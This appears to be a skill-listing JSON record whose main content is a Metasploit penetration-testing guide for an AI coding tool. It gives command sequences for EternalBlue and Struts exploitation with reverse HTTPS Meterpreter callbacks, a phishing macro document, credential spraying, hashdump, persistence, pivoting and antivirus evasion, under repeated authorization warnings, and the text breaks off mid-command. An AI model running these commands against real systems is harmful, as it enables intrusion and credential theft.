\"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 6,\n \"total_lines\": 2189,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T15:47:47.339Z\"\n },\n \"content\": {\n \"user_title\": \"Metasploit Framework Penetration Testing Guide\",\n \"value_statement\": \"Learn to conduct authorized penetration tests using Metasploit Framework. This skill provides structured workflows for exploit development, vulnerability validation, and red team operations with proper authorization and compliance guidance.\",\n \"seo_keywords\": [\n \"metasploit penetration testing\",\n \"exploit development\",\n \"vulnerability validation\",\n \"red team operations\",\n \"meterpreter sessions\",\n \"credential harvesting\",\n \"privilege escalation\",\n \"lateral movement\",\n \"Claude\",\n \"Claude Code\"\n ],\n \"actual_capabilities\": [\n \"Metasploit Framework console initialization and workspace management for penetration testing engagements\",\n \"Vulnerability scanning and exploit module selection based on identified services\",\n \"Payload configuration including reverse HTTPS Meterpreter and listener setup\",\n \"Post-exploitation techniques for session management and system enumeration\",\n \"Privilege escalation guidance using local exploit suggester and getsystem\",\n \"MITRE ATT&CK framework mapping for TTPs documentation\"\n ],\n \"limitations\": [\n \"No automated exploit execution - provides documentation and guidance only\",\n \"Does not install or configure Metasploit Framework dependencies\",\n \"Requires separate Metasploit installation (not included in skill)\",\n \"Authorization and legal compliance are entirely the user's responsibility\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security professionals\",\n \"title\": \"Authorized penetration testing\",\n \"description\": \"Conduct structured penetration tests with proper scoping, authorization documentation, and compliance with security standards like PTES and OWASP.\"\n },\n {\n \"target_user\": \"Red team operators\",\n \"title\": \"Red team operations\",\n \"description\": \"Plan and execute red team exercises including exploit delivery, post-exploitation, and lateral movement assessments with operational security guidance.\"\n },\n {\n \"target_user\": \"Security researchers\",\n \"title\": \"Vulnerability research\",\n \"description\": \"Demonstrate exploit impact and validate vulnerabilities in controlled research environments with proper authorization and documentation.\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Quick Start\",\n \"scenario\": \"Initialize Metasploit\",\n \"prompt\": \"Show me how to initialize Metasploit Framework, start the PostgreSQL database, and verify connectivity for a penetration test engagement\"\n },\n {\n \"title\": \"Exploit Setup\",\n \"scenario\": \"Configure exploits\",\n \"prompt\": \"How do I select an appropriate exploit module in Metasploit, configure target options, set up a reverse HTTPS payload, and execute the exploit\"\n },\n {\n \"title\": \"Post-Exploitation\",\n \"scenario\": \"Gather session data\",\n \"prompt\": \"What are the essential Meterpreter commands to gather system information, enumerate processes, and identify privilege escalation opportunities after gaining a session\"\n },\n {\n \"title\": \"ATT&CK Mapping\",\n \"scenario\": \"Map techniques\",\n \"prompt\": \"Map common Metasploit activities like initial access, credential access, and lateral movement to specific MITRE ATT&CK techniques and tactics\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"How do I set up a Metasploit workspace for an engagement and import Nmap scan results?\",\n \"output\": [\n \"Create a dedicated workspace: workspace -a \u003cengagement-name>\",\n \"Import Nmap results: db_import /path/to/nmap-scan.xml\",\n \"Verify hosts: hosts command\",\n \"View services: services command\",\n \"Recommended Nmap flags for Metasploit: db_nmap -sV -sC -O \u003ctarget>\"\n ]\n },\n {\n \"input\": \"What post-exploitation commands should I run first after getting a Meterpreter session?\",\n \"output\": [\n \"Verify session: getuid (shows current user)\",\n \"System info: sysinfo (OS, architecture)\",\n \"Check privileges: getprivs (available permissions)\",\n \"Network config: ipconfig, route (routing table)\",\n \"Process list: ps (running processes for migration)\",\n \"Check AV: run post/windows/gather/enum_av_excluded\"\n ]\n },\n {\n \"input\": \"How do I configure a reverse HTTPS Meterpreter payload for a Windows target?\",\n \"output\": [\n \"Set payload: set PAYLOAD windows/x64/meterpreter/reverse_https\",\n \"Configure listener host: set LHOST \u003cyour-ip>\",\n \"Configure listener port: set LPORT 443\",\n \"Verify options: show options\",\n \"Start handler: use exploit/multi/handler then run\"\n ]\n }\n ],\n \"best_practices\": [\n \"Always verify written authorization from asset owners before conducting any penetration testing activities on systems\",\n \"Document all commands executed, findings discovered, and evidence collected for compliance reporting and legal protection\",\n \"Map activities to MITRE ATT&CK framework to understand adversary techniques and improve detection capabilities\",\n \"Close all sessions cleanly and remove exploitation artifacts after completing the assessment engagement\"\n ],\n \"anti_patterns\": [\n \"Testing systems without explicit written authorization - this is illegal and may result in criminal prosecution\",\n \"Failing to document scope boundaries during engagement - may lead to compliance violations and legal liability\",\n \"Leaving active sessions or persistence mechanisms in place after assessment - always clean up all Metasploit artifacts\"\n ],\n \"faq\": [\n {\n \"question\": \"What dependencies are required for Metasploit?\",\n \"answer\": \"Metasploit requires PostgreSQL for database connectivity, Nmap for reconnaissance integration, and the metasploit-framework package. Kali Linux includes Metasploit preconfigured.\"\n },\n {\n \"question\": \"Does this skill execute exploits automatically?\",\n \"answer\": \"No, this skill provides documentation and guidance only. Actual exploit execution requires separate Metasploit installation and is performed by the user.\"\n },\n {\n \"question\": \"How do I map Metasploit activities to MITRE ATT&CK?\",\n \"answer\": \"Use the ATT&CK mapping section which documents TTPs: Initial Access (T1190), Execution (T1059), Persistence (T1547), Privilege Escalation (T1068), Credential Access (T1003), and Lateral Movement (T1021).\"\n },\n {\n \"question\": \"What authorization is required for penetration testing?\",\n \"answer\": \"Written authorization from the asset owner is mandatory. Document scope, testing windows, target systems, and emergency contacts before starting any testing activities.\"\n },\n {\n \"question\": \"How do I handle discovered credentials during testing?\",\n \"answer\": \"Document credentials found but do not access systems beyond scope. Follow engagement rules for data handling. Report findings per escalation procedures immediately.\"\n },\n {\n \"question\": \"How is this different from automated vulnerability scanners?\",\n \"answer\": \"Metasploit provides exploitation capabilities rather than just detection. This enables validation of vulnerability impact and realistic attack simulation. Use with appropriate authorization.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"assets\",\n \"type\": \"dir\",\n \"path\": \"assets\",\n \"children\": [\n {\n \"name\": \"ci-config-template.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci-config-template.yml\",\n \"lines\": 358\n },\n {\n \"name\": \"rule-template.yaml\",\n \"type\": \"file\",\n \"path\": \"assets/rule-template.yaml\",\n \"lines\": 356\n }\n ]\n },\n {\n \"name\": \"references\",\n \"type\": \"dir\",\n \"path\": \"references\",\n \"children\": [\n {\n \"name\": \"EXAMPLE.md\",\n \"type\": \"file\",\n \"path\": \"references/EXAMPLE.md\",\n \"lines\": 551\n },\n {\n \"name\": \"WORKFLOW_CHECKLIST.md\",\n \"type\": \"file\",\n \"path\": \"references/WORKFLOW_CHECKLIST.md\",\n \"lines\": 254\n }\n ]\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 456\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":29293,"content_sha256":"f20ccdff57cadb8b86506da199425c7be334c23d880923c49fdf1c6149018942"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Metasploit Framework Penetration Testing","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery.","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Quick Start","type":"text"}]},{"type":"paragraph","content":[{"text":"Initialize Metasploit console and verify database connectivity:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Start PostgreSQL database (required for workspace management)\nsudo systemctl start postgresql\n\n# Initialize Metasploit database\nmsfdb init\n\n# Launch Metasploit console\nmsfconsole\n\n# Verify database connection\nmsf6 > db_status","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Penetration Testing Workflow","type":"text"}]},{"type":"paragraph","content":[{"text":"Progress: [ ] 1. Verify authorization and scope [ ] 2. Configure workspace and target enumeration [ ] 3. Identify and select appropriate exploits [ ] 4. Configure payload and exploit options [ ] 5. Execute exploitation with proper documentation [ ] 6. Conduct post-exploitation activities (if authorized) [ ] 7. Document findings with impact assessment [ ] 8. Clean up artifacts and sessions","type":"text"}]},{"type":"paragraph","content":[{"text":"Work through each step systematically. Check off completed items.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. Authorization Verification","type":"text"}]},{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":": Before any testing activities:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm written authorization from asset owner","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review scope document for in-scope targets","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify IP ranges and systems authorized for testing","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm allowed testing windows and blackout periods","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document point of contact for emergency escalation","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. Workspace Setup","type":"text"}]},{"type":"paragraph","content":[{"text":"Create isolated workspace for engagement:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > workspace -a \u003cengagement-name>\nmsf6 > workspace \u003cengagement-name>\nmsf6 > db_nmap -sV -sC -O \u003ctarget-ip-range>","type":"text"}]},{"type":"paragraph","content":[{"text":"Import existing reconnaissance data:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > db_import /path/to/nmap-scan.xml\nmsf6 > hosts\nmsf6 > services","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. Exploit Selection","type":"text"}]},{"type":"paragraph","content":[{"text":"Search for relevant exploits based on enumerated services:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > search type:exploit platform:windows \u003cservice-name>\nmsf6 > search cve:\u003ccve-id>\nmsf6 > search eternalblue","type":"text"}]},{"type":"paragraph","content":[{"text":"Evaluate exploit suitability:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reliability Ranking","type":"text","marks":[{"type":"strong"}]},{"text":": Excellent > Great > Good > Normal > Average","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Stability","type":"text","marks":[{"type":"strong"}]},{"text":": Check crash potential","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Target Compatibility","type":"text","marks":[{"type":"strong"}]},{"text":": Verify OS version and architecture","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Required Credentials","type":"text","marks":[{"type":"strong"}]},{"text":": Determine if authentication needed","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Exploit Configuration","type":"text"}]},{"type":"paragraph","content":[{"text":"Configure selected exploit module:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > use exploit/windows/smb/ms17_010_eternalblue\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > show options\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS \u003ctarget-ip>\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445\n\n# Configure payload\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST \u003clistener-ip>\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443\n\n# Validate configuration\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > show options\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > check","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Exploitation Execution","type":"text"}]},{"type":"paragraph","content":[{"text":"Execute exploit with logging:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enable logging\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-\u003cdate>.log\n\n# Run exploit\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > exploit\n\n# Or run without auto-interaction\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j","type":"text"}]},{"type":"paragraph","content":[{"text":"Exploitation outcomes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session opened","type":"text","marks":[{"type":"strong"}]},{"text":": Successful exploitation, proceed to post-exploitation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploit failed","type":"text","marks":[{"type":"strong"}]},{"text":": Review target compatibility, try alternative exploits","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Target not vulnerable","type":"text","marks":[{"type":"strong"}]},{"text":": Document finding, move to next target","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Service crash","type":"text","marks":[{"type":"strong"}]},{"text":": Document stability issue, attempt service restoration if authorized","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Post-Exploitation (Authorized Activities Only)","type":"text"}]},{"type":"paragraph","content":[{"text":"Once session established, conduct authorized post-exploitation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# List active sessions\nmsf6 > sessions -l\n\n# Interact with session\nmsf6 > sessions -i \u003csession-id>\n\n# Gather system information\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getprivs\n\n# Check network configuration\nmeterpreter > ipconfig\nmeterpreter > route\n\n# Enumerate running processes\nmeterpreter > ps\n\n# Check security controls\nmeterpreter > run post/windows/gather/enum_av_excluded\nmeterpreter > run post/windows/gather/enum_logged_on_users","type":"text"}]},{"type":"paragraph","content":[{"text":"Common post-exploitation modules","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/windows/gather/hashdump","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Extract password hashes (requires SYSTEM privileges)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/multi/recon/local_exploit_suggester","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Identify privilege escalation opportunities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/windows/gather/credentials/credential_collector","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Gather stored credentials","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/windows/manage/persistence_exe","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Establish persistence (if explicitly authorized)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. Privilege Escalation","type":"text"}]},{"type":"paragraph","content":[{"text":"If authorized for privilege escalation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Identify escalation vectors\nmeterpreter > run post/multi/recon/local_exploit_suggester\n\n# Migrate to stable process\nmeterpreter > ps\nmeterpreter > migrate \u003cstable-process-pid>\n\n# Attempt privilege escalation\nmeterpreter > getsystem\nmeterpreter > getuid","type":"text"}]},{"type":"paragraph","content":[{"text":"Manual privilege escalation workflow:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Background current session: ","type":"text"},{"text":"background","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Select escalation module: ","type":"text"},{"text":"use exploit/windows/local/\u003cescalation-module>","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set session: ","type":"text"},{"text":"set SESSION \u003csession-id>","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run exploit: ","type":"text"},{"text":"exploit","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. Lateral Movement","type":"text"}]},{"type":"paragraph","content":[{"text":"For authorized internal penetration tests:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate network\nmeterpreter > run post/windows/gather/arp_scanner RHOSTS=\u003cinternal-subnet>\nmeterpreter > run auxiliary/scanner/smb/smb_version\n\n# Pivot through compromised host\nmeterpreter > run autoroute -s \u003cinternal-subnet>/24\n\n# Use compromised host as proxy\nmsf6 > use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) > set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) > run -j","type":"text"}]},{"type":"paragraph","content":[{"text":"Configure proxychains for pivoting:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Edit /etc/proxychains4.conf\nsocks4 127.0.0.1 1080\n\n# Run tools through pivot\nproxychains nmap -sT -Pn \u003cinternal-target>","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Considerations","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Authorization & Legal Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Written Authorization","type":"text","marks":[{"type":"strong"}]},{"text":": Maintain signed penetration testing agreement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Scope Adherence","type":"text","marks":[{"type":"strong"}]},{"text":": Only test explicitly authorized systems and networks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data Protection","type":"text","marks":[{"type":"strong"}]},{"text":": Handle discovered data per engagement rules of engagement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incident Response","type":"text","marks":[{"type":"strong"}]},{"text":": Immediately report critical findings per escalation procedures","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Evidence Handling","type":"text","marks":[{"type":"strong"}]},{"text":": Maintain chain of custody for forensic evidence","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Operational Security","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Callback Infrastructure","type":"text","marks":[{"type":"strong"}]},{"text":": Use dedicated, authorized callback servers","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Attribution Prevention","type":"text","marks":[{"type":"strong"}]},{"text":": Avoid personal infrastructure or identifiable indicators","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Traffic Encryption","type":"text","marks":[{"type":"strong"}]},{"text":": Use encrypted payloads (HTTPS, DNS tunneling)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Artifact Cleanup","type":"text","marks":[{"type":"strong"}]},{"text":": Remove exploitation artifacts post-engagement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session Management","type":"text","marks":[{"type":"strong"}]},{"text":": Close sessions cleanly to avoid detection alerts","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Audit Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"Log all penetration testing activities:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timestamp of exploitation attempts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Source and destination systems","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploit modules and payloads used","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Commands executed in sessions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data accessed or exfiltrated","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Privilege escalation attempts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Lateral movement actions","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PTES","type":"text","marks":[{"type":"strong"}]},{"text":": Penetration Testing Execution Standard compliance","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP","type":"text","marks":[{"type":"strong"}]},{"text":": Alignment with application security testing methodology","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK","type":"text","marks":[{"type":"strong"}]},{"text":": Map TTPs to ATT&CK framework for threat modeling","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PCI-DSS 11.3","type":"text","marks":[{"type":"strong"}]},{"text":": Penetration testing for payment card environments","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SOC2","type":"text","marks":[{"type":"strong"}]},{"text":": Security testing for service organization controls","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Patterns","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 1: Web Application Exploitation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > use exploit/multi/http/apache_struts2_content_type_ognl\nmsf6 exploit(...) > set RHOSTS \u003cweb-server>\nmsf6 exploit(...) > set TARGETURI /vulnerable-app\nmsf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp\nmsf6 exploit(...) > exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 2: Database Server Exploitation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# SQL Server exploitation\nmsf6 > use exploit/windows/mssql/mssql_payload\nmsf6 exploit(mssql_payload) > set RHOSTS \u003csql-server>\nmsf6 exploit(mssql_payload) > set USERNAME sa\nmsf6 exploit(mssql_payload) > set PASSWORD \u003cpassword>\nmsf6 exploit(mssql_payload) > exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 3: Phishing Campaign Delivery","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Generate malicious document\nmsf6 > use exploit/windows/fileformat/office_word_macro\nmsf6 exploit(office_word_macro) > set FILENAME report.docm\nmsf6 exploit(office_word_macro) > set PAYLOAD windows/meterpreter/reverse_https\nmsf6 exploit(office_word_macro) > set LHOST \u003ccallback-server>\nmsf6 exploit(office_word_macro) > exploit\n\n# Set up listener\nmsf6 > use exploit/multi/handler\nmsf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https\nmsf6 exploit(multi/handler) > set LHOST \u003ccallback-server>\nmsf6 exploit(multi/handler) > set LPORT 443\nmsf6 exploit(multi/handler) > exploit -j","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 4: Credential Spraying","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > use auxiliary/scanner/smb/smb_login\nmsf6 auxiliary(scanner/smb/smb_login) > set RHOSTS file:/path/to/targets.txt\nmsf6 auxiliary(scanner/smb/smb_login) > set SMBUser Administrator\nmsf6 auxiliary(scanner/smb/smb_login) > set SMBPass \u003ccommon-password>\nmsf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true\nmsf6 auxiliary(scanner/smb/smb_login) > run","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Integration Points","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"CI/CD Integration","type":"text"}]},{"type":"paragraph","content":[{"text":"Automated vulnerability validation in security pipelines:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Headless Metasploit resource script\ncat > exploit_validation.rc \u003c\u003cEOF\nworkspace -a ci-validation\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS \\${TARGET_IP}\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST \\${CALLBACK_IP}\nexploit -z\nexit\nEOF\n\n# Run headless validation\nmsfconsole -r exploit_validation.rc -o validation_results.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Security Tools Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Nmap Integration","type":"text","marks":[{"type":"strong"}]},{"text":": Import reconnaissance data with ","type":"text"},{"text":"db_import","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Cobalt Strike","type":"text","marks":[{"type":"strong"}]},{"text":": Export sessions to Cobalt Strike beacons","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Empire","type":"text","marks":[{"type":"strong"}]},{"text":": Handoff sessions to PowerShell Empire framework","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BloodHound","type":"text","marks":[{"type":"strong"}]},{"text":": Combine with Active Directory enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Burp Suite","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate web vulnerability findings","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"MITRE ATT&CK Mapping","type":"text"}]},{"type":"paragraph","content":[{"text":"Map Metasploit activities to ATT&CK framework:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Initial Access","type":"text","marks":[{"type":"strong"}]},{"text":": T1190 (Exploit Public-Facing Application)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Execution","type":"text","marks":[{"type":"strong"}]},{"text":": T1059 (Command and Scripting Interpreter)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Persistence","type":"text","marks":[{"type":"strong"}]},{"text":": T1547 (Boot or Logon Autostart Execution)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Privilege Escalation","type":"text","marks":[{"type":"strong"}]},{"text":": T1068 (Exploitation for Privilege Escalation)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Credential Access","type":"text","marks":[{"type":"strong"}]},{"text":": T1003 (OS Credential Dumping)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Lateral Movement","type":"text","marks":[{"type":"strong"}]},{"text":": T1021 (Remote Services)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Collection","type":"text","marks":[{"type":"strong"}]},{"text":": T1005 (Data from Local System)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exfiltration","type":"text","marks":[{"type":"strong"}]},{"text":": T1041 (Exfiltration Over C2 Channel)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Session Dies Immediately","type":"text"}]},{"type":"paragraph","content":[{"text":"Causes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Antivirus detection of payload","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incompatible payload architecture (x86 vs x64)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Firewall blocking callback connection","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Try evasion techniques\nmsf6 > use evasion/windows/windows_defender_exe\nmsf6 evasion(...) > set PAYLOAD windows/meterpreter/reverse_https\nmsf6 evasion(...) > generate -f /path/to/evaded_payload.exe\n\n# Use staged payload instead of stageless\nset PAYLOAD windows/meterpreter/reverse_https # staged\n# vs\nset PAYLOAD windows/meterpreter_reverse_https # stageless\n\n# Migrate immediately after session establishment\nmeterpreter > run post/windows/manage/migrate","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Exploit Fails with \"Exploit completed, but no session was created\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Causes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Target not vulnerable","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incorrect target version or architecture","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Payload compatibility issue","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Verify target vulnerability\nmsf6 exploit(...) > check\n\n# Adjust target manually\nmsf6 exploit(...) > show targets\nmsf6 exploit(...) > set 